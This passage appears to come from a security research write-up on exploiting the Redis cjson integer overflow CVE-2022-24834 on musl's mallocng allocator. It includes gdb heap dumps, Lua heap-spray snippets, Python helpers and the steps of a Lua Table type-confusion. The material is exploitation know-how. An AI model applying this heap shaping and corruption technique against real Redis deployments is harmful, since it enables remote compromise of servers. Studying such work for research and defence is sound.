sizeclass stride   sizeclass stride   sizeclass stride   sizeclass stride
1         0x20     13        0x140    25        0xaa0    37        0x5540
2         0x30     14        0x190    26        0xcc0    38        0x6650
3         0x40     15        0x1f0    27        0xff0    39        0x7ff0
4         0x50     16        0x240    28        0x1240   40        0x9240
5         0x60     17        0x2a0    29        0x1540   41        0xaaa0
6         0x70     18        0x320    30        0x1990   42        0xccc0
7         0x80     19        0x3f0    31        0x1ff0   43        0xfff0
8         0x90     20        0x480    32        0x2480   44        0x12480
9         0xa0     21        0x540    33        0x2aa0   45        0x15540
10        0xc0     22        0x660    34        0x3320   46        0x19980
11        0xf0     23        0x7f0    35        0x3ff0   47        0x1fff0
12        0x120    24        0x920    36        0x4910
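
These strides are simply mallocng’s size_classes table scaled by the
16-byte UNIT. The snippet below reproduces the mapping (the array
values are taken from my reading of musl 1.2.4’s
src/malloc/mallocng/malloc.c, so treat this as a convenience rather
than a reference):

UNIT = 16
SIZE_CLASSES = [
    1, 2, 3, 4, 5, 6, 7, 8,
    9, 10, 12, 15, 18, 20, 25, 31,
    36, 42, 50, 63, 72, 84, 102, 127,
    146, 170, 204, 255, 292, 340, 409, 511,
    584, 682, 818, 1023, 1169, 1364, 1637, 2047,
    2340, 2730, 3276, 4095, 4680, 5460, 6552, 8191,
]

for sizeclass, units in enumerate(SIZE_CLASSES):
    print(f"sizeclass {sizeclass:2d} -> stride {units * UNIT:#x}")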

Using a cycling offset requires an additional 4-byte in-band header
and also increases by UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, like if sometimes smaller allocations are placed into larger
strides rather than always allocating a new group, but I’m not sure if
that’s possible as I haven’t spent enough time studying the allocator
yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables and fill their arrays such that the resulting allocation
sizes are ~0x100 bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == heading has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address,
but rather 0x10 bytes further. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.

The main takeaways here are:

  • For certain allocation sizes, the exact offset of an overflow may be
    unreliable unless you know exactly how many times the slot has been
    allocated.
  • For a scenario like overwriting the LSB of a pointer inside of such
    a group, you could be unable to predict where the resulting pointer will
    point inside of another slot, depending on whether you know how many
    times each slot has been used.

Considering all this in the context of the exploit this article
describes, I think this mitigation wouldn’t have stopped us, even if
the structures had been in a stride group that uses the cycling
offsets, because we have fine-grained control over all the allocations
performed for our overflow and can easily control the number of times
the slots are actually used prior to the overflow. That said, since I
originally thought it might be a problem and wanted to understand it,
hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting
CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability, it’s an integer overflow when
calculating the size of a buffer to allocate while doing cjson
encoding. By triggering the overflow, we end up with an undersized
buffer that we can write 0x15555555 bytes to (341 MiB), which may be
large enough to qualify as a “wild copy,” although given a 64-bit
target and the amount of memory on modern systems, it’s not too hard
to deal with. Exploitation requires that the target buffer we want to
corrupt be adjacent to the overflown buffer with no unmapped gaps in
between, so the copy must traverse at a minimum around 350 MiB of
mapped memory.
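
To make the arithmetic concrete, here is the overflow sketched in
Python. The escape buffer is sized as roughly len * 6 + 2 in a 32-bit
integer (see the Ricerca Security write-up for the exact expression;
this is a reconstruction):

# Worst case, every character escapes to 6 bytes ("\uXXXX"), so cjson
# reserves roughly len * 6 + 2 bytes -- computed in a 32-bit int.
src_len = 0x15555555                 # length of the attacker's string

needed = src_len * 6 + 2             # true requirement
wrapped = needed - (1 << 32) if needed & 0x80000000 else needed

print(hex(needed))   # 0x80000000: just past INT_MAX
print(wrapped)       # -2147483648: the size the 32-bit code handles
print(hex(src_len))  # ~341 MiB is then copied into the tiny buffer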

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some
target chunk (or slot in our case) with the 0x22 value corresponding
to the ending double quote. In the Ricerca Security write-up, their
diagrams indicated they overwrote the LSB of a
Table->array pointer; however, I believe their exploit
actually overwrites the LSB of a TValue->value pointer,
which exists in a chunk that is pointed to by the
Table->array. I may misunderstand their exploit, but at
any rate, the latter is the approach I used.
To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in memory backing the group to be unmapped
using munmap().

 

This means we must leverage feng shui to have valid in-use
allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.
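
The real tool is a gdb plugin, but a rough standalone equivalent that
walks /proc/<pid>/maps and reports the gaps looks like this (my own
simplified sketch, not the pwndbg code):

import sys

def show_gaps(pid):
    """Print each mapping and flag unmapped gaps between regions."""
    prev_end = None
    with open(f"/proc/{pid}/maps") as maps:
        for line in maps:
            fields = line.split()
            start, end = (int(x, 16) for x in fields[0].split("-"))
            if prev_end is not None and start > prev_end:
                print(f"      -- GAP: {start - prev_end:#x}")
            print(f"{start:#x} - {end:#x} {end - start:#12x} {fields[1]}")
            prev_end = end

if __name__ == "__main__":
    show_gaps(sys.argv[1])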

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to the mapping output are as follows:

  • ^-- ADJ: <num> indicates a series of adjacent
    memory regions, where <num> is the accumulated
    size
  • !!! GUARD PAGE indicates a series of pages with no
    permissions, which writing to would trigger a fault
  • [00....0] -- GAP: <num> indicates an unmapped
    page between mapped regions of memory, where <num> is
    the size of the gap
   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct
Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big or larger than the
amount of memory that will actually be written during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside of the large string map and thus be
useless. Although in the case above our destination buffer (index 12)
was allocated later in memory than 9 and 11 and so won’t overflow into
them, in practice, after doing heap shaping to fill all the gaps, this
won’t necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

 

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), as sizes too large or too small seemed to
occasionally create unwanted gaps.

To actually trigger the large allocations, I create a Lua table of
floating-point numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to
create a table with an array big enough to cause the 0x101000 map
(keeping in mind the in-band metadata, which will add overhead). I do
something like this:

-- pre-allocate tables
local spray_pages = {}
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings by filling each table's array part
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end
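
To sanity-check the 0x101000 figure, here is a quick back-of-the-envelope calculation (my own sketch, assuming Lua 5.1’s 16-byte TValue, power-of-two array growth, and a simplified one-page allowance for mallocng’s in-band metadata):

# Why 0xD000 TValues produce a 0x101000-byte mapping (simplified model)
MMAP_THRESHOLD = 0x1FFEC  # mallocng: larger requests get a single-slot group
PAGE = 0x1000
TVALUE_SIZE = 0x10        # Lua 5.1 TValue on 64-bit: 8-byte value + tag, padded

def next_pow2(n):
    p = 1
    while p < n:
        p <<= 1
    return p

array_bytes = next_pow2(0xD000) * TVALUE_SIZE   # Lua grows arrays in powers of two
assert array_bytes > MMAP_THRESHOLD             # lands in 'special' sizeclass 63
mapping = (array_bytes + PAGE) // PAGE * PAGE   # one page of slack for metadata
print(hex(array_bytes), hex(mapping))           # 0x100000 0x101000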

I used the gap mapping script to confirm this behavior while
debugging, and eventually ended up with output like the following, where
each new table allocation creates a new array mapping:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...
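
For reference, here is a rough Python sketch of such a gap-mapping helper (my own reimplementation with made-up formatting, not the exact script used above):

import sys

def rw_regions(pid):
    regions = []
    with open(f"/proc/{pid}/maps") as f:
        for line in f:
            addrs, perms = line.split()[:2]
            if perms.startswith("rw"):
                start, end = (int(x, 16) for x in addrs.split("-"))
                regions.append((start, end))
    return regions

def main(pid):
    regions = rw_regions(pid)
    for i, (start, end) in enumerate(regions):
        print(f"{i:4}: {start:#x} - {end:#x} {end - start:#11x} rw-p")
        # report the hole (if any) between this region and the next one
        if i + 1 < len(regions) and regions[i + 1][0] != end:
            print(f"      -- GAP: {regions[i + 1][0] - end:#x}")

if __name__ == "__main__":
    main(int(sys.argv[1]))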

So the layout will ultimately look something like:

 

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

One more complication is that the exact offset of the overflow may
change by a small amount if the Lua script changes, or if there are
other side effects on the heap. This seems to be due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this deeply, but it is likely possible to
eliminate the nondeterminism entirely. I chose to work around it by
using a slightly smaller offset, then repeatedly triggering the overflow
while increasing the length. The main caveat of multiple attempts is
that, due to corruption of legitimate chunks, we have to avoid the
garbage collector firing. Also, Lua strings are immutable and interned,
so each string we allocate needs to be unique, meaning each attempt
consumes a few hundred MB of memory. If our offset is too far away, we
may well exhaust the memory of the target before we succeed. In
practice, this isn’t a big issue: once the exploit is stable and the
code isn’t changing, the offset won’t change either.
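
The retry logic itself is simple; a pseudocode-level sketch (trigger_overflow and target_corrupted are placeholders for the exploit’s primitives, not real APIs):

def brute_force(trigger_overflow, target_corrupted, base_len, step=0x10, max_tries=32):
    for i in range(max_tries):
        # each attempt needs a fresh, unique source string (Lua interns
        # strings), so every retry costs a few hundred MB of target memory
        trigger_overflow(base_len + i * step)
        if target_corrupted():
            return True
    return False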

Successful brute force applied to the previous example looks
something like this:

 

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

 

While targeting ptmalloc2, the Ricerca Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

 

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-size group,
assuming we know the address of a table from which to start:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. We want to,
however, analyze the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap gdb plugin to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20

Before going further, I want to note that, other than the
Table being targeted by the overwrite, these stride-0x50
slots can be TString values that we control. So below, if I
say target index N, it means the slot at index N is a
Table, but you can assume that the slots adjacent to it
(N-1 and N-2) are controlled TString structures.

Let’s start from the lowest LSB in the list and go until the pattern
